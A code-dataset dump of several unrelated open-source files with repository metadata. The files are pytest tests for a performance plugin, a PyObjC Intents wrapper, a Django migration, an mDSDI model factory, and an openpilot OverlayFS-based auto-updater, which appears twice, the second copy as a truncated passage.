assert result.ret == ExitCode.OK
def test_performance_disable(testdir):
# Given
testdir.makepyfile("""
import pytest
import time
from pytest_performance import PerformanceException
def foo():
time.sleep(2)
return 1
def test_sth(performance):
pass
""")
# When
result = testdir.runpytest(SKIP_FLAG)
# Then
assert result.ret == ExitCode.OK
def test_performance_default(testdir):
# Given
testdir.makepyfile("""
def test_sth():
assert 1 == 1
""")
# When
result = testdir.runpytest()
# Then
assert result.ret == ExitCode.OK
| 18.802469
| 59
| 0.580433
|
from _pytest.config import ExitCode
from pytest_performance import SKIP_FLAG
def test_performance(testdir):
testdir.makepyfile("""
def foo():
return 1
def test_sth(performance):
assert 1 == performance(foo, unit='s')
""")
result = testdir.runpytest()
assert result.ret == ExitCode.OK
def test_performance_slow(testdir):
testdir.makepyfile("""
import pytest
import time
from pytest_performance import PerformanceException
def foo():
time.sleep(2)
return 1
def test_sth(performance):
with pytest.raises(PerformanceException):
performance(foo)
""")
result = testdir.runpytest()
assert result.ret == ExitCode.OK
def test_performance_disable(testdir):
testdir.makepyfile("""
import pytest
import time
from pytest_performance import PerformanceException
def foo():
time.sleep(2)
return 1
def test_sth(performance):
pass
""")
result = testdir.runpytest(SKIP_FLAG)
assert result.ret == ExitCode.OK
def test_performance_default(testdir):
testdir.makepyfile("""
def test_sth():
assert 1 == 1
""")
result = testdir.runpytest()
assert result.ret == ExitCode.OK
| true
| true
|
1c3e90d3f35f39a658602e8cef7ee1e6154cdd37
| 709
|
py
|
Python
|
Intents/__init__.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 4
|
2019-03-11T18:05:49.000Z
|
2021-05-22T21:09:09.000Z
|
Intents/__init__.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
Intents/__init__.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1
|
2019-03-18T18:53:36.000Z
|
2019-03-18T18:53:36.000Z
|
'''
Python mapping for the Intents framework.
This module does not contain docstrings for the wrapped code; check Apple's
documentation for details on how to use these functions and classes.
'''
import objc
import sys
import Foundation
from Intents import _metadata
from Intents._Intents import *
sys.modules['Intents'] = mod = objc.ObjCLazyModule(
"Intents",
"com.apple.Intents",
objc.pathForFramework("/System/Library/Frameworks/Intents.framework"),
_metadata.__dict__, None, {
'__doc__': __doc__,
'objc': objc,
'__path__': __path__,
'__loader__': globals().get('__loader__', None),
}, (Foundation,))
import sys
del sys.modules['Intents._metadata']
| 24.448276
| 75
| 0.705219
|
import objc
import sys
import Foundation
from Intents import _metadata
from Intents._Intents import *
sys.modules['Intents'] = mod = objc.ObjCLazyModule(
"Intents",
"com.apple.Intents",
objc.pathForFramework("/System/Library/Frameworks/Intents.framework"),
_metadata.__dict__, None, {
'__doc__': __doc__,
'objc': objc,
'__path__': __path__,
'__loader__': globals().get('__loader__', None),
}, (Foundation,))
import sys
del sys.modules['Intents._metadata']
| true
| true
|
1c3e91ca1ff386eb0061642315e5264fc880d898
| 609
|
py
|
Python
|
migrations/0002_auto_20180330_1541.py
|
j-ollivier/sonov-main
|
78123513fa73deae174363750fd64ab3e92a3d2a
|
[
"Apache-2.0"
] | null | null | null |
migrations/0002_auto_20180330_1541.py
|
j-ollivier/sonov-main
|
78123513fa73deae174363750fd64ab3e92a3d2a
|
[
"Apache-2.0"
] | null | null | null |
migrations/0002_auto_20180330_1541.py
|
j-ollivier/sonov-main
|
78123513fa73deae174363750fd64ab3e92a3d2a
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.0.3 on 2018-03-30 13:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='son',
name='audio_file',
field=models.FileField(default='', upload_to='static/main/audio'),
preserve_default=False,
),
migrations.AlterField(
model_name='son',
name='thumbnail',
field=models.ImageField(upload_to='static/main/thumbnail'),
),
]
| 24.36
| 78
| 0.576355
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='son',
name='audio_file',
field=models.FileField(default='', upload_to='static/main/audio'),
preserve_default=False,
),
migrations.AlterField(
model_name='son',
name='thumbnail',
field=models.ImageField(upload_to='static/main/thumbnail'),
),
]
| true
| true
|
1c3e93fcc37764a327723d2663f9748a7fb8c3b8
| 427
|
py
|
Python
|
algorithms/mDSDI/src/models/model_factory.py
|
VinAIResearch/mDSDI
|
8ec49085d8389ab490ec633c3ae4bf66be085366
|
[
"Apache-2.0"
] | 9
|
2021-09-30T12:39:01.000Z
|
2022-03-17T07:49:59.000Z
|
algorithms/mDSDI/src/models/model_factory.py
|
VinAIResearch/mDSDI
|
8ec49085d8389ab490ec633c3ae4bf66be085366
|
[
"Apache-2.0"
] | null | null | null |
algorithms/mDSDI/src/models/model_factory.py
|
VinAIResearch/mDSDI
|
8ec49085d8389ab490ec633c3ae4bf66be085366
|
[
"Apache-2.0"
] | 1
|
2022-01-13T06:02:04.000Z
|
2022-01-13T06:02:04.000Z
|
from algorithms.mDSDI.src.models.mnistnet import MNIST_CNN, Color_MNIST_CNN
from algorithms.mDSDI.src.models.resnet import ResNet
nets_map = {"mnistnet": MNIST_CNN, "cmnistnet": Color_MNIST_CNN, "resnet50": ResNet}
def get_model(name):
if name not in nets_map:
raise ValueError("Name of model unknown %s" % name)
def get_model_fn(**kwargs):
return nets_map[name](**kwargs)
return get_model_fn
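# Minimal usage sketch; the keyword arguments a concrete backbone expects are
# not defined in this file, so the constructor call is left commented out.
if __name__ == "__main__":
    build_resnet = get_model("resnet50")
    # model = build_resnet(...)  # kwargs are forwarded to ResNet(...)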
| 26.6875
| 84
| 0.728337
|
from algorithms.mDSDI.src.models.mnistnet import MNIST_CNN, Color_MNIST_CNN
from algorithms.mDSDI.src.models.resnet import ResNet
nets_map = {"mnistnet": MNIST_CNN, "cmnistnet": Color_MNIST_CNN, "resnet50": ResNet}
def get_model(name):
if name not in nets_map:
raise ValueError("Name of model unknown %s" % name)
def get_model_fn(**kwargs):
return nets_map[name](**kwargs)
return get_model_fn
| true
| true
|
1c3e9520fb0514245589ee15baf161677033977a
| 14,397
|
py
|
Python
|
selfdrive/updated.py
|
919bot/Tessa
|
9b48ff9020e8fb6992fc78271f2720fd19e01093
|
[
"MIT"
] | null | null | null |
selfdrive/updated.py
|
919bot/Tessa
|
9b48ff9020e8fb6992fc78271f2720fd19e01093
|
[
"MIT"
] | null | null | null |
selfdrive/updated.py
|
919bot/Tessa
|
9b48ff9020e8fb6992fc78271f2720fd19e01093
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Safe Update: A simple service that waits for network access and tries to
# update every 10 minutes. It's intended to make the OP update process more
# robust against Git repository corruption. This service DOES NOT try to fix
# an already-corrupt BASEDIR Git repo, only prevent it from happening.
#
# During normal operation, both onroad and offroad, the update process makes
# no changes to the BASEDIR install of OP. All update attempts are performed
# in a disposable staging area provided by OverlayFS. It assumes the deleter
# process provides enough disk space to carry out the process.
#
# If an update succeeds, a flag is set, and the update is swapped in at the
# next reboot. If an update is interrupted or otherwise fails, the OverlayFS
# upper layer and metadata can be discarded before trying again.
#
# The swap on boot is triggered by launch_chffrplus.sh
# gated on the existence of $FINALIZED/.overlay_consistent and also the
# existence and mtime of $BASEDIR/.overlay_init.
#
# Other than build byproducts, BASEDIR should not be modified while this
# service is running. Developers modifying code directly in BASEDIR should
# disable this service.
import os
import datetime
import subprocess
import psutil
from stat import S_ISREG, S_ISDIR, S_ISLNK, S_IMODE, ST_MODE, ST_INO, ST_UID, ST_GID, ST_ATIME, ST_MTIME
import shutil
import signal
from pathlib import Path
import fcntl
import threading
from cffi import FFI
import time
from common.basedir import BASEDIR
from common.params import Params
from selfdrive.swaglog import cloudlog
from common.op_params import opParams
from common.travis_checker import travis
STAGING_ROOT = "/data/safe_staging"
OVERLAY_UPPER = os.path.join(STAGING_ROOT, "upper")
OVERLAY_METADATA = os.path.join(STAGING_ROOT, "metadata")
OVERLAY_MERGED = os.path.join(STAGING_ROOT, "merged")
FINALIZED = os.path.join(STAGING_ROOT, "finalized")
NICE_LOW_PRIORITY = ["nice", "-n", "19"]
SHORT = os.getenv("SHORT") is not None
auto_update = opParams().get('autoUpdate', True) if not travis else False
# Workaround for the EON/termux build of Python having os.link removed.
ffi = FFI()
ffi.cdef("int link(const char *oldpath, const char *newpath);")
libc = ffi.dlopen(None)
class WaitTimeHelper:
ready_event = threading.Event()
shutdown = False
def __init__(self):
signal.signal(signal.SIGTERM, self.graceful_shutdown)
signal.signal(signal.SIGINT, self.graceful_shutdown)
signal.signal(signal.SIGHUP, self.update_now)
def graceful_shutdown(self, signum, frame):
# umount -f doesn't appear effective in avoiding "device busy" on EON,
# so don't actually die until the next convenient opportunity in main().
cloudlog.info("caught SIGINT/SIGTERM, dismounting overlay at next opportunity")
self.shutdown = True
self.ready_event.set()
def update_now(self, signum, frame):
cloudlog.info("caught SIGHUP, running update check immediately")
self.ready_event.set()
def wait_between_updates(ready_event):
ready_event.clear()
if SHORT:
ready_event.wait(timeout=10)
else:
ready_event.wait(timeout=60 * 10)
def link(src, dest):
# Workaround for the EON/termux build of Python having os.link removed.
return libc.link(src.encode(), dest.encode())
def run(cmd, cwd=None):
return subprocess.check_output(cmd, cwd=cwd, stderr=subprocess.STDOUT, encoding='utf8')
def remove_consistent_flag():
os.system("sync")
consistent_file = Path(os.path.join(FINALIZED, ".overlay_consistent"))
try:
consistent_file.unlink()
except FileNotFoundError:
pass
os.system("sync")
def set_consistent_flag():
consistent_file = Path(os.path.join(FINALIZED, ".overlay_consistent"))
os.system("sync")
consistent_file.touch()
os.system("sync")
def set_update_available_params(new_version=False):
params = Params()
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if new_version:
try:
with open(os.path.join(FINALIZED, "RELEASES.md"), "rb") as f:
r = f.read()
r = r[:r.find(b'\n\n')] # Slice latest release notes
params.put("ReleaseNotes", r + b"\n")
except Exception:
params.put("ReleaseNotes", "")
params.put("UpdateAvailable", "1")
def dismount_ovfs():
if os.path.ismount(OVERLAY_MERGED):
cloudlog.error("unmounting existing overlay")
run(["umount", "-l", OVERLAY_MERGED])
def init_ovfs():
cloudlog.info("preparing new safe staging area")
Params().put("UpdateAvailable", "0")
remove_consistent_flag()
dismount_ovfs()
if os.path.isdir(STAGING_ROOT):
shutil.rmtree(STAGING_ROOT)
for dirname in [STAGING_ROOT, OVERLAY_UPPER, OVERLAY_METADATA, OVERLAY_MERGED, FINALIZED]:
os.mkdir(dirname, 0o755)
if not os.lstat(BASEDIR).st_dev == os.lstat(OVERLAY_MERGED).st_dev:
raise RuntimeError("base and overlay merge directories are on different filesystems; not valid for overlay FS!")
# Remove consistent flag from current BASEDIR so it's not copied over
if os.path.isfile(os.path.join(BASEDIR, ".overlay_consistent")):
os.remove(os.path.join(BASEDIR, ".overlay_consistent"))
# We sync FS object atimes (which EON doesn't use) and mtimes, but ctimes
# are outside user control. Make sure Git is set up to ignore system ctimes,
# because they change when we make hard links during finalize. Otherwise,
# there is a lot of unnecessary churn. This appears to be a common need on
# OSX as well: https://www.git-tower.com/blog/make-git-rebase-safe-on-osx/
run(["git", "config", "core.trustctime", "false"], BASEDIR)
# We are temporarily using copytree to copy the directory, which also changes
# inode numbers. Ignore those changes too.
run(["git", "config", "core.checkStat", "minimal"], BASEDIR)
# Leave a timestamped canary in BASEDIR to check at startup. The EON clock
# should be correct by the time we get here. If the init file disappears, or
# critical mtimes in BASEDIR are newer than .overlay_init, continue.sh can
  # assume that BASEDIR has been used for local development or otherwise
  # modified, and skip the update activation attempt.
Path(os.path.join(BASEDIR, ".overlay_init")).touch()
overlay_opts = f"lowerdir={BASEDIR},upperdir={OVERLAY_UPPER},workdir={OVERLAY_METADATA}"
run(["mount", "-t", "overlay", "-o", overlay_opts, "none", OVERLAY_MERGED])
def inodes_in_tree(search_dir):
"""Given a search root, produce a dictionary mapping of inodes to relative
pathnames of regular files (no directories, symlinks, or special files)."""
inode_map = {}
for root, dirs, files in os.walk(search_dir, topdown=True):
for file_name in files:
full_path_name = os.path.join(root, file_name)
st = os.lstat(full_path_name)
if S_ISREG(st[ST_MODE]):
inode_map[st[ST_INO]] = full_path_name
return inode_map
def dup_ovfs_object(inode_map, source_obj, target_dir):
"""Given a relative pathname to copy, and a new target root, duplicate the
source object in the target root, using hardlinks for regular files."""
source_full_path = os.path.join(OVERLAY_MERGED, source_obj)
st = os.lstat(source_full_path)
target_full_path = os.path.join(target_dir, source_obj)
if S_ISREG(st[ST_MODE]):
# Hardlink all regular files; ownership and permissions are shared.
link(inode_map[st[ST_INO]], target_full_path)
else:
# Recreate all directories and symlinks; copy ownership and permissions.
if S_ISDIR(st[ST_MODE]):
os.mkdir(os.path.join(FINALIZED, source_obj), S_IMODE(st[ST_MODE]))
elif S_ISLNK(st[ST_MODE]):
os.symlink(os.readlink(source_full_path), target_full_path)
os.chmod(target_full_path, S_IMODE(st[ST_MODE]), follow_symlinks=False)
else:
# Ran into a FIFO, socket, etc. Should not happen in OP install dir.
# Ignore without copying for the time being; revisit later if needed.
cloudlog.error("can't copy this file type: %s" % source_full_path)
os.chown(target_full_path, st[ST_UID], st[ST_GID], follow_symlinks=False)
# Sync target mtimes to the cached lstat() value from each source object.
# Restores shared inode mtimes after linking, fixes symlinks and dirs.
os.utime(target_full_path, (st[ST_ATIME], st[ST_MTIME]), follow_symlinks=False)
def finalize_from_ovfs_hardlink():
"""Take the current OverlayFS merged view and finalize a copy outside of
  OverlayFS, ready to be swapped in at BASEDIR. The copy is made with hardlinks."""
cloudlog.info("creating finalized version of the overlay")
# The "copy" is done with hardlinks, but since the OverlayFS merge looks
# like a different filesystem, and hardlinks can't cross filesystems, we
# have to borrow a source pathname from the upper or lower layer.
inode_map = inodes_in_tree(BASEDIR)
inode_map.update(inodes_in_tree(OVERLAY_UPPER))
shutil.rmtree(FINALIZED)
os.umask(0o077)
os.mkdir(FINALIZED)
for root, dirs, files in os.walk(OVERLAY_MERGED, topdown=True):
for obj_name in dirs:
relative_path_name = os.path.relpath(os.path.join(root, obj_name), OVERLAY_MERGED)
dup_ovfs_object(inode_map, relative_path_name, FINALIZED)
for obj_name in files:
relative_path_name = os.path.relpath(os.path.join(root, obj_name), OVERLAY_MERGED)
dup_ovfs_object(inode_map, relative_path_name, FINALIZED)
cloudlog.info("done finalizing overlay")
def finalize_from_ovfs_copy():
"""Take the current OverlayFS merged view and finalize a copy outside of
  OverlayFS, ready to be swapped in at BASEDIR. The copy is made with shutil.copytree."""
cloudlog.info("creating finalized version of the overlay")
shutil.rmtree(FINALIZED)
shutil.copytree(OVERLAY_MERGED, FINALIZED, symlinks=True)
cloudlog.info("done finalizing overlay")
def attempt_update(time_offroad, need_reboot):
cloudlog.info("attempting git update inside staging overlay")
git_fetch_output = run(NICE_LOW_PRIORITY + ["git", "fetch"], OVERLAY_MERGED)
cloudlog.info("git fetch success: %s", git_fetch_output)
cur_hash = run(["git", "rev-parse", "HEAD"], OVERLAY_MERGED).rstrip()
upstream_hash = run(["git", "rev-parse", "@{u}"], OVERLAY_MERGED).rstrip()
new_version = cur_hash != upstream_hash
git_fetch_result = len(git_fetch_output) > 0 and (
git_fetch_output != "Failed to add the host to the list of known hosts (/data/data/com.termux/files/home/.ssh/known_hosts).\n")
cloudlog.info("comparing %s to %s" % (cur_hash, upstream_hash))
if new_version or git_fetch_result:
cloudlog.info("Running update")
if new_version:
cloudlog.info("git reset in progress")
r = [
run(NICE_LOW_PRIORITY + ["git", "reset", "--hard", "@{u}"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "clean", "-xdf"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "submodule", "init"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "submodule", "update"], OVERLAY_MERGED),
]
cloudlog.info("git reset success: %s", '\n'.join(r))
# Un-set the validity flag to prevent the finalized tree from being
# activated later if the finalize step is interrupted
remove_consistent_flag()
finalize_from_ovfs_copy()
# Make sure the validity flag lands on disk LAST, only when the local git
# repo and OP install are in a consistent state.
set_consistent_flag()
cloudlog.info("update successful!")
else:
cloudlog.info("nothing new from git at this time")
set_update_available_params(new_version=new_version)
return auto_update_reboot(time_offroad, need_reboot, new_version)
def auto_update_reboot(time_offroad, need_reboot, new_version):
min_reboot_time = 10.
if new_version and auto_update and not os.path.isfile("/data/no_ota_updates"):
try:
if 'already up to date' not in run(NICE_LOW_PRIORITY + ["git", "pull"]).lower():
need_reboot = True
except:
pass
if time.time() - time_offroad > min_reboot_time * 60 and need_reboot: # allow reboot x minutes after stopping openpilot or starting EON
os.system('reboot')
return need_reboot
def main(gctx=None):
update_failed_count = 0
overlay_init_done = False
wait_helper = WaitTimeHelper()
params = Params()
if not os.geteuid() == 0:
raise RuntimeError("updated must be launched as root!")
# Set low io priority
p = psutil.Process()
if psutil.LINUX:
p.ionice(psutil.IOPRIO_CLASS_BE, value=7)
ov_lock_fd = open('/tmp/safe_staging_overlay.lock', 'w')
try:
fcntl.flock(ov_lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
raise RuntimeError("couldn't get overlay lock; is another updated running?")
time_offroad = time.time()
need_reboot = False
while True:
update_failed_count += 1
time_wrong = datetime.datetime.now().year < 2019
ping_failed = subprocess.call(["ping", "-W", "4", "-c", "1", "8.8.8.8"])
# Wait until we have a valid datetime to initialize the overlay
if not (ping_failed or time_wrong):
try:
        # If the git directory has modifications after we created the overlay
# we need to recreate the overlay
if overlay_init_done:
overlay_init_fn = os.path.join(BASEDIR, ".overlay_init")
git_dir_path = os.path.join(BASEDIR, ".git")
new_files = run(["find", git_dir_path, "-newer", overlay_init_fn])
if len(new_files.splitlines()):
cloudlog.info(".git directory changed, recreating overlay")
overlay_init_done = False
if not overlay_init_done:
init_ovfs()
overlay_init_done = True
if params.get("IsOffroad") == b"1":
need_reboot = attempt_update(time_offroad, need_reboot)
update_failed_count = 0
else:
time_offroad = time.time()
cloudlog.info("not running updater, openpilot running")
except subprocess.CalledProcessError as e:
cloudlog.event(
"update process failed",
cmd=e.cmd,
output=e.output,
returncode=e.returncode
)
overlay_init_done = False
except Exception:
cloudlog.exception("uncaught updated exception, shouldn't happen")
params.put("UpdateFailedCount", str(update_failed_count))
wait_between_updates(wait_helper.ready_event)
if wait_helper.shutdown:
break
# We've been signaled to shut down
dismount_ovfs()
if __name__ == "__main__":
main()
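# --- Editor's note / illustrative sketch, not part of the original updater ---
# WaitTimeHelper wires SIGHUP to update_now(), so an operator or another
# process can force an immediate update check instead of waiting out the
# ten-minute timer. Finding the updater's PID is left to the caller here.
def _poke_updater(updater_pid):
  os.kill(updater_pid, signal.SIGHUP)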
| 37.010283
| 139
| 0.720845
|
# robust against Git repository corruption. This service DOES NOT try to fix
# an already-corrupt BASEDIR Git repo, only prevent it from happening.
#
# During normal operation, both onroad and offroad, the update process makes
# no changes to the BASEDIR install of OP. All update attempts are performed
# in a disposable staging area provided by OverlayFS. It assumes the deleter
# process provides enough disk space to carry out the process.
#
# If an update succeeds, a flag is set, and the update is swapped in at the
# next reboot. If an update is interrupted or otherwise fails, the OverlayFS
# upper layer and metadata can be discarded before trying again.
#
# The swap on boot is triggered by launch_chffrplus.sh, gated on the existence
# of $FINALIZED/.overlay_consistent and on the existence and mtime of
# $BASEDIR/.overlay_init.
#
# Other than build byproducts, BASEDIR should not be modified while this
# service is running. Developers modifying code directly in BASEDIR should
# disable this service.
import os
import datetime
import subprocess
import psutil
from stat import S_ISREG, S_ISDIR, S_ISLNK, S_IMODE, ST_MODE, ST_INO, ST_UID, ST_GID, ST_ATIME, ST_MTIME
import shutil
import signal
from pathlib import Path
import fcntl
import threading
from cffi import FFI
import time
from common.basedir import BASEDIR
from common.params import Params
from selfdrive.swaglog import cloudlog
from common.op_params import opParams
from common.travis_checker import travis
STAGING_ROOT = "/data/safe_staging"
OVERLAY_UPPER = os.path.join(STAGING_ROOT, "upper")
OVERLAY_METADATA = os.path.join(STAGING_ROOT, "metadata")
OVERLAY_MERGED = os.path.join(STAGING_ROOT, "merged")
FINALIZED = os.path.join(STAGING_ROOT, "finalized")
NICE_LOW_PRIORITY = ["nice", "-n", "19"]
SHORT = os.getenv("SHORT") is not None
auto_update = opParams().get('autoUpdate', True) if not travis else False
# Workaround for the EON/termux build of Python having os.link removed.
ffi = FFI()
ffi.cdef("int link(const char *oldpath, const char *newpath);")
libc = ffi.dlopen(None)
class WaitTimeHelper:
ready_event = threading.Event()
shutdown = False
def __init__(self):
signal.signal(signal.SIGTERM, self.graceful_shutdown)
signal.signal(signal.SIGINT, self.graceful_shutdown)
signal.signal(signal.SIGHUP, self.update_now)
def graceful_shutdown(self, signum, frame):
# umount -f doesn't appear effective in avoiding "device busy" on EON,
cloudlog.info("caught SIGINT/SIGTERM, dismounting overlay at next opportunity")
self.shutdown = True
self.ready_event.set()
def update_now(self, signum, frame):
cloudlog.info("caught SIGHUP, running update check immediately")
self.ready_event.set()
def wait_between_updates(ready_event):
ready_event.clear()
if SHORT:
ready_event.wait(timeout=10)
else:
ready_event.wait(timeout=60 * 10)
def link(src, dest):
# Workaround for the EON/termux build of Python having os.link removed.
return libc.link(src.encode(), dest.encode())
def run(cmd, cwd=None):
return subprocess.check_output(cmd, cwd=cwd, stderr=subprocess.STDOUT, encoding='utf8')
def remove_consistent_flag():
os.system("sync")
consistent_file = Path(os.path.join(FINALIZED, ".overlay_consistent"))
try:
consistent_file.unlink()
except FileNotFoundError:
pass
os.system("sync")
def set_consistent_flag():
consistent_file = Path(os.path.join(FINALIZED, ".overlay_consistent"))
os.system("sync")
consistent_file.touch()
os.system("sync")
def set_update_available_params(new_version=False):
params = Params()
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if new_version:
try:
with open(os.path.join(FINALIZED, "RELEASES.md"), "rb") as f:
r = f.read()
r = r[:r.find(b'\n\n')] # Slice latest release notes
params.put("ReleaseNotes", r + b"\n")
except Exception:
params.put("ReleaseNotes", "")
params.put("UpdateAvailable", "1")
def dismount_ovfs():
if os.path.ismount(OVERLAY_MERGED):
cloudlog.error("unmounting existing overlay")
run(["umount", "-l", OVERLAY_MERGED])
def init_ovfs():
cloudlog.info("preparing new safe staging area")
Params().put("UpdateAvailable", "0")
remove_consistent_flag()
dismount_ovfs()
if os.path.isdir(STAGING_ROOT):
shutil.rmtree(STAGING_ROOT)
for dirname in [STAGING_ROOT, OVERLAY_UPPER, OVERLAY_METADATA, OVERLAY_MERGED, FINALIZED]:
os.mkdir(dirname, 0o755)
if not os.lstat(BASEDIR).st_dev == os.lstat(OVERLAY_MERGED).st_dev:
raise RuntimeError("base and overlay merge directories are on different filesystems; not valid for overlay FS!")
# Remove consistent flag from current BASEDIR so it's not copied over
if os.path.isfile(os.path.join(BASEDIR, ".overlay_consistent")):
os.remove(os.path.join(BASEDIR, ".overlay_consistent"))
# are outside user control. Make sure Git is set up to ignore system ctimes,
# because they change when we make hard links during finalize. Otherwise,
# there is a lot of unnecessary churn. This appears to be a common need on
# OSX as well: https://www.git-tower.com/blog/make-git-rebase-safe-on-osx/
run(["git", "config", "core.trustctime", "false"], BASEDIR)
# We are temporarily using copytree to copy the directory, which also changes
# inode numbers. Ignore those changes too.
run(["git", "config", "core.checkStat", "minimal"], BASEDIR)
# Leave a timestamped canary in BASEDIR to check at startup. The EON clock
# should be correct by the time we get here. If the init file disappears, or
# critical mtimes in BASEDIR are newer than .overlay_init, continue.sh can
  # assume that BASEDIR has been used for local development or otherwise
  # modified, and skip the update activation attempt.
Path(os.path.join(BASEDIR, ".overlay_init")).touch()
overlay_opts = f"lowerdir={BASEDIR},upperdir={OVERLAY_UPPER},workdir={OVERLAY_METADATA}"
run(["mount", "-t", "overlay", "-o", overlay_opts, "none", OVERLAY_MERGED])
def inodes_in_tree(search_dir):
inode_map = {}
for root, dirs, files in os.walk(search_dir, topdown=True):
for file_name in files:
full_path_name = os.path.join(root, file_name)
st = os.lstat(full_path_name)
if S_ISREG(st[ST_MODE]):
inode_map[st[ST_INO]] = full_path_name
return inode_map
def dup_ovfs_object(inode_map, source_obj, target_dir):
source_full_path = os.path.join(OVERLAY_MERGED, source_obj)
st = os.lstat(source_full_path)
target_full_path = os.path.join(target_dir, source_obj)
if S_ISREG(st[ST_MODE]):
# Hardlink all regular files; ownership and permissions are shared.
link(inode_map[st[ST_INO]], target_full_path)
else:
# Recreate all directories and symlinks; copy ownership and permissions.
if S_ISDIR(st[ST_MODE]):
os.mkdir(os.path.join(FINALIZED, source_obj), S_IMODE(st[ST_MODE]))
elif S_ISLNK(st[ST_MODE]):
os.symlink(os.readlink(source_full_path), target_full_path)
os.chmod(target_full_path, S_IMODE(st[ST_MODE]), follow_symlinks=False)
else:
# Ran into a FIFO, socket, etc. Should not happen in OP install dir.
# Ignore without copying for the time being; revisit later if needed.
cloudlog.error("can't copy this file type: %s" % source_full_path)
os.chown(target_full_path, st[ST_UID], st[ST_GID], follow_symlinks=False)
os.utime(target_full_path, (st[ST_ATIME], st[ST_MTIME]), follow_symlinks=False)
def finalize_from_ovfs_hardlink():
cloudlog.info("creating finalized version of the overlay")
# have to borrow a source pathname from the upper or lower layer.
inode_map = inodes_in_tree(BASEDIR)
inode_map.update(inodes_in_tree(OVERLAY_UPPER))
shutil.rmtree(FINALIZED)
os.umask(0o077)
os.mkdir(FINALIZED)
for root, dirs, files in os.walk(OVERLAY_MERGED, topdown=True):
for obj_name in dirs:
relative_path_name = os.path.relpath(os.path.join(root, obj_name), OVERLAY_MERGED)
dup_ovfs_object(inode_map, relative_path_name, FINALIZED)
for obj_name in files:
relative_path_name = os.path.relpath(os.path.join(root, obj_name), OVERLAY_MERGED)
dup_ovfs_object(inode_map, relative_path_name, FINALIZED)
cloudlog.info("done finalizing overlay")
def finalize_from_ovfs_copy():
cloudlog.info("creating finalized version of the overlay")
shutil.rmtree(FINALIZED)
shutil.copytree(OVERLAY_MERGED, FINALIZED, symlinks=True)
cloudlog.info("done finalizing overlay")
def attempt_update(time_offroad, need_reboot):
cloudlog.info("attempting git update inside staging overlay")
git_fetch_output = run(NICE_LOW_PRIORITY + ["git", "fetch"], OVERLAY_MERGED)
cloudlog.info("git fetch success: %s", git_fetch_output)
cur_hash = run(["git", "rev-parse", "HEAD"], OVERLAY_MERGED).rstrip()
upstream_hash = run(["git", "rev-parse", "@{u}"], OVERLAY_MERGED).rstrip()
new_version = cur_hash != upstream_hash
git_fetch_result = len(git_fetch_output) > 0 and (
git_fetch_output != "Failed to add the host to the list of known hosts (/data/data/com.termux/files/home/.ssh/known_hosts).\n")
cloudlog.info("comparing %s to %s" % (cur_hash, upstream_hash))
if new_version or git_fetch_result:
cloudlog.info("Running update")
if new_version:
cloudlog.info("git reset in progress")
r = [
run(NICE_LOW_PRIORITY + ["git", "reset", "--hard", "@{u}"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "clean", "-xdf"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "submodule", "init"], OVERLAY_MERGED),
run(NICE_LOW_PRIORITY + ["git", "submodule", "update"], OVERLAY_MERGED),
]
cloudlog.info("git reset success: %s", '\n'.join(r))
# Un-set the validity flag to prevent the finalized tree from being
# activated later if the finalize step is interrupted
remove_consistent_flag()
finalize_from_ovfs_copy()
# Make sure the validity flag lands on disk LAST, only when the local git
# repo and OP install are in a consistent state.
set_consistent_flag()
cloudlog.info("update successful!")
else:
cloudlog.info("nothing new from git at this time")
set_update_available_params(new_version=new_version)
return auto_update_reboot(time_offroad, need_reboot, new_version)
def auto_update_reboot(time_offroad, need_reboot, new_version):
min_reboot_time = 10.
if new_version and auto_update and not os.path.isfile("/data/no_ota_updates"):
try:
if 'already up to date' not in run(NICE_LOW_PRIORITY + ["git", "pull"]).lower():
need_reboot = True
except:
pass
if time.time() - time_offroad > min_reboot_time * 60 and need_reboot: # allow reboot x minutes after stopping openpilot or starting EON
os.system('reboot')
return need_reboot
def main(gctx=None):
update_failed_count = 0
overlay_init_done = False
wait_helper = WaitTimeHelper()
params = Params()
if not os.geteuid() == 0:
raise RuntimeError("updated must be launched as root!")
# Set low io priority
p = psutil.Process()
if psutil.LINUX:
p.ionice(psutil.IOPRIO_CLASS_BE, value=7)
ov_lock_fd = open('/tmp/safe_staging_overlay.lock', 'w')
try:
fcntl.flock(ov_lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
raise RuntimeError("couldn't get overlay lock; is another updated running?")
time_offroad = time.time()
need_reboot = False
while True:
update_failed_count += 1
time_wrong = datetime.datetime.now().year < 2019
ping_failed = subprocess.call(["ping", "-W", "4", "-c", "1", "8.8.8.8"])
if not (ping_failed or time_wrong):
try:
if overlay_init_done:
overlay_init_fn = os.path.join(BASEDIR, ".overlay_init")
git_dir_path = os.path.join(BASEDIR, ".git")
new_files = run(["find", git_dir_path, "-newer", overlay_init_fn])
if len(new_files.splitlines()):
cloudlog.info(".git directory changed, recreating overlay")
overlay_init_done = False
if not overlay_init_done:
init_ovfs()
overlay_init_done = True
if params.get("IsOffroad") == b"1":
need_reboot = attempt_update(time_offroad, need_reboot)
update_failed_count = 0
else:
time_offroad = time.time()
cloudlog.info("not running updater, openpilot running")
except subprocess.CalledProcessError as e:
cloudlog.event(
"update process failed",
